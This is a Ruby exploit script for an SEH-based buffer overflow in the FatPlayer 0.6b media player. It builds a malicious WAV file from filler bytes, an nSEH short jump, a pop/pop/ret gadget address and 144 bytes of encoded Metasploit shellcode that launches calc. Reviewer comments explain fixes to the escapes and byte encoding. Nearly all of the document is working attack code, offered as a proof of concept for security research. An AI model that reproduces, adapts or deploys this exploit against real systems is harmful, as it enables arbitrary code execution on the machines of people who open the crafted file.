
# Title : FatPlayer 0.6b Malicious WAV Buffer Overflow Vulnerability (SEH)
# Published : 2010-10-18
# Author : James Fitts


# Exploit Title: FatPlayer 0.6b Malicious WAV Buffer Overflow Vulnerability (SEH)
# Date: 10/18/10
# Author: james [AT] learnsecurityonline [DOT] com
# Software Link: http://sourceforge.net/projects/fatplayer/files/
# Version: 0.6 Beta
# Tested on: Windows XP SP3 EN
# CVE: N/A

#! /usr/bin/env ruby

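# Layout of crash.wav (all sizes in bytes, in file order):
#
#   4132  filler 'A'               distance from start of data to the SEH record
#      4  nSEH   90 90 eb 06       nop; nop; jmp short +6
#      4  SEH    0x0046bee3        pop/pop/ret gadget inside FatPlayer.exe
#      2  pad    'BB'              skipped by the jmp (4-byte SEH + 2-byte pad = 6)
#    144  shellcode                windows/exec CMD=calc (x86/shikata_ga_nai)
#
# NOTE(review): the listing as published had every backslash stripped
# ("x41" instead of "\x41"), so it produced ASCII text rather than the raw
# bytes.  The escapes are restored below, and every piece is built as a
# binary (ASCII-8BIT) string so the concatenation does not raise
# Encoding::CompatibilityError on Ruby >= 1.9 (pack('V') yields a binary
# string, a "\x.." literal does not).
# No RIFF/WAVE header is written -- the original did not write one either,
# so the overflow presumably fires before any format validation (unverified).

# Offset of the SEH record from the start of the file.
JUNK_LEN = 4132

# pop pop ret from FatPlayer.exe (main module; address supplied by the
# original author).  Its high byte is 0x00 (little-endian: e3 be 46 00).
POP_POP_RET = 0x0046bee3

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
SHELLCODE = [
  "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc",
  "\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78",
  "\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85",
  "\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5",
  "\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c",
  "\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21",
  "\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5",
  "\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27",
  "\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3",
  "\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53",
  "\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f",
  "\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6",
  "\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8",
  "\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61",
  "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f",
  "\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca"
].join.b.freeze

# Assemble the malicious file contents: filler, nSEH, SEH, pad, shellcode.
# @return [String] ASCII-8BIT string of JUNK_LEN + 4 + 4 + 2 + 144 bytes
def build_crash_wav
  filler = [0x41].pack('C') * JUNK_LEN
  # nop; nop; jmp short +6 -- measured from the end of the jmp, +6 skips the
  # 4-byte handler address and the 2-byte pad and lands on the shellcode.
  nseh = [0x90, 0x90, 0xeb, 0x06].pack('C*')
  seh = [POP_POP_RET].pack('V') # little-endian DWORD, as the handler field expects
  pad = [0x42, 0x42].pack('C*')
  filler + nseh + seh + pad + SHELLCODE
end

# Write the payload to +path+.  Binary mode ('wb') so that Windows does not
# translate any 0x0a byte inside the raw data into CR LF.
# @param path [String] output file name
# @return [Integer] number of bytes written
def write_crash_wav(path = 'crash.wav')
  File.open(path, 'wb') { |f| f.write(build_crash_wav) }
end

write_crash_wav if __FILE__ == $PROGRAM_NAME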